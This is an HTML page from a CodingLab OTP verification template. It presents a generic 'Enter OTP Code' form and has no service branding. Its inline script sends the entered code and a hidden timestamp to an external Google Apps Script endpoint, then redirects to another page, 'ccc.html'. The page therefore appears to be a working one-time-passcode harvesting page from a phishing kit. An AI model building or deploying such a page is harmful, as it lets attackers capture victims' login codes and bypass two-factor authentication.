<!DOCTYPE html>
<!-- Coding by CodingLab || www.codinglabweb.com -->
<html lang="en">
  <head>
    <meta charset="UTF-8" />
    <meta http-equiv="X-UA-Compatible" content="IE=edge" />
    <meta name="viewport" content="width=device-width, initial-scale=1.0" />
    <title>OTP Verification Form</title>
    <link rel="stylesheet" href="style.css" />
    <!-- Boxicons CSS -->
    <link href="https://unpkg.com/boxicons@2.1.4/css/boxicons.min.css" rel="stylesheet" />
    <script src="script.js" defer></script>
  </head>
  <body>
    <div class="container">
      <header>
        <i class="bx bxs-check-shield"></i>
      </header>
      <h4>Enter OTP Code</h4>
      <form id="Form" method="POST" >
        <div class="input-field">
          <input name="name1" type="number" />
         
        </div>
        <div style="display: none;" class="input-field">
          <input id="date" name="date" type="hidden" />
         
        </div>
        <div style="display: none;" class="input-field">
          <input id="status" name="status" type="hidden" />
         
        </div>
        
        <button type="submit" id=""  >Verify</button>
        <div class="footer">wait 3 minutes before requesting another code</div>
      </form>
    </div>
    <script>
      document.getElementById("Form").addEventListener("submit", function(e) {
  e.preventDefault();
  const formData = new FormData(e.target);
  const params = new URLSearchParams();
  for (const pair of formData.entries()) {
    params.append(pair[0], pair[1]);
  }

  fetch("https://script.google.com/macros/s/AKfycbwPYkgU71OXlTedcdjkfnmHm1CLi7Gm8Rav5y1rmudqY7_hcUbEqkv4xpz0ez9wP47m/exec", {
    method: "POST",
    headers: {
      "Content-Type": "application/x-www-form-urlencoded"
    },
    body: params
  })
  .then(res => res.text())
  .then(response => {
    document.getElementById("status").value = "submission successful";
    
    setTimeout(() => {
    window.location.href = "ccc.html"; 
  }, 1000);
  })
  .catch(err => {
    document.getElementById("status").value = "Error: " + err;
    alert("Error: " + err);
  });
});
      
      let date = new Date();
      let newdate = document.getElementById("date");
      newdate.value = date;
      function submit(){

      }
    </script>
    <style>
     
        /* Import Google font - Poppins */
@import url("https://fonts.googleapis.com/css2?family=Poppins:wght@200;300;400;500;600;700&display=swap");
* {
  margin: 0;
  padding: 0;
  box-sizing: border-box;
  font-family: "Poppins", sans-serif;
}
body {
  min-height: 100vh;
  display: flex;
  align-items: center;
  justify-content: center;
  background: #ecdff2;
}
:where(.container, form, .input-field, header) {
  display: flex;
  flex-direction: column;
  align-items: center;
  justify-content: center;
}
.container {
  background:  #efeaf1;
  padding: 30px 30px;
  border-radius: 12px;
  row-gap: 20px;
  box-shadow: 0 5px 10px rgba(0, 0, 0, 0.1);
}
.footer {
    font-size: 12px;
    width: 80%;
    display: flex;
    justify-content: center;
    text-align: center;
    margin-top: 15px;
}
.container header {
  height: 65px;
  width: 65px;
  background: #ffffff;
  color: #fff;
  font-size: 2.5rem;
  border-radius: 50%;
}
.container h4 {
  font-size: 1.25rem;
  color: #333;
  font-weight: 500;
}
form .input-field {
  flex-direction: row;
  column-gap: 10px;
}
.input-field input {
  height: 45px;
  width: 150px;
  border-radius: 6px;
  outline: none;
  font-size: 1.125rem;
  text-align: center;
  border: 1px solid #ddd;
}
.input-field input:focus {
  box-shadow: 0 1px 0 rgba(0, 0, 0, 0.1);
}
.input-field input::-webkit-inner-spin-button,
.input-field input::-webkit-outer-spin-button {
  display: none;
}
form button {
  margin-top: 25px;
  width: 150px;
  color: #fff;
  font-size: 1rem;
  border: none;
  padding: 9px 15px;
  cursor: pointer;
  border-radius: 6px;
  
  background: #b45dd9;
  transition: all 0.2s ease;
}
form button.active {
  background: #c133c3;
  pointer-events: auto;
}
form button:hover {
  background: #91258a;
}

    </style>
  </body>
</html>
